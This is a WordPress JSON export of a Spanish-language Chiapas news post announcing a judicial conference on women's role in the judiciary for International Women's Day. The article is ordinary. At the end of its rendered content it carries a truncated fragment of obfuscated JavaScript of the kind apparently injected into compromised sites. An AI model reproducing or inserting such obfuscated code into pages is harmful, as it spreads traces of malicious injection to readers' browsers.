{"id":20830,"date":"2025-03-10T05:04:38","date_gmt":"2025-03-10T05:04:38","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20830"},"modified":"2025-03-10T05:04:39","modified_gmt":"2025-03-10T05:04:39","slug":"con-conferencia-magistral-el-poder-judicial-continua-la-conmemoracion-del-dia-internacional-de-las-mujeres","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20830","title":{"rendered":"Con conferencia magistral el Poder Judicial contin\u00faa la conmemoraci\u00f3n del D\u00eda Internacional de las Mujeres"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"574\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250309-WA0023-1024x574.jpg\" alt=\"\" class=\"wp-image-20831\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250309-WA0023-1024x574.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250309-WA0023-300x168.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250309-WA0023-768x431.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250309-WA0023-1536x861.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250309-WA0023-2048x1149.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>9 de marzo del 2025. En el marco del D\u00eda Internacional de las Mujeres, el Poder Judicial del Estado de Chiapas llevar\u00e1 a cabo una conferencia magistral titulada &#8220;El papel de la mujer en el Poder Judicial&#8221;. La disertaci\u00f3n estar\u00e1 a cargo de la ministra de la Suprema Corte de Justicia de la Naci\u00f3n, Yasm\u00edn Esquivel Mossa.<\/p>\n\n\n\n<p>Este evento, que se celebrar\u00e1 el viernes 14 de marzo desde las instalaciones del palacio de justicia de Tuxtla Guti\u00e9rrez, tiene como objetivo sensibilizar y reconocer la relevancia de las mujeres en los espacios de toma de decisiones y su influencia en la transformaci\u00f3n de nuestro sistema judicial, as\u00ed como los retos a los que se enfrentan en el entorno laboral y profesional.<\/p>\n\n\n\n<p>Por ello, la visi\u00f3n y el contexto de este tema por parte de la ministra Esquivel Mossa ser\u00e1n enriquecedores, ya que por m\u00e1s de 20 a\u00f1os se ha desempe\u00f1ado en el \u00e1mbito jurisdiccional, destac\u00e1ndose por su lucha en la defensa y promoci\u00f3n de los derechos humanos, en especial de grupos en condiciones de vulnerabilidad, como mujeres, ni\u00f1os, ni\u00f1as, adolescentes, personas con discapacidad y adultos mayores.<\/p>\n\n\n\n<p>Con esta conferencia magistral se reafirma el compromiso del Poder Judicial con la equidad de g\u00e9nero y la promoci\u00f3n de los derechos de las mujeres, adem\u00e1s de seguir impulsando la inclusi\u00f3n, la equidad y el respeto, reconociendo su invaluable aporte en todas las esferas de la vida p\u00fablica y privada.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 9 de marzo del 2025. En el marco del D\u00eda Internacional de las Mujeres, el Poder Judicial del Estado de Chiapas llevar\u00e1 a cabo una conferencia magistral titulada &#8220;El papel de la mujer en el Poder Judicial&#8221;. La disertaci\u00f3n estar\u00e1 a cargo de la ministra de la Suprema Corte de Justicia de la Naci\u00f3n, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20831,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20830","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20830","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20830"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20830\/revisions"}],"predecessor-version":[{"id":20832,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20830\/revisions\/20832"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20831"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20830"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20830"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20830"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}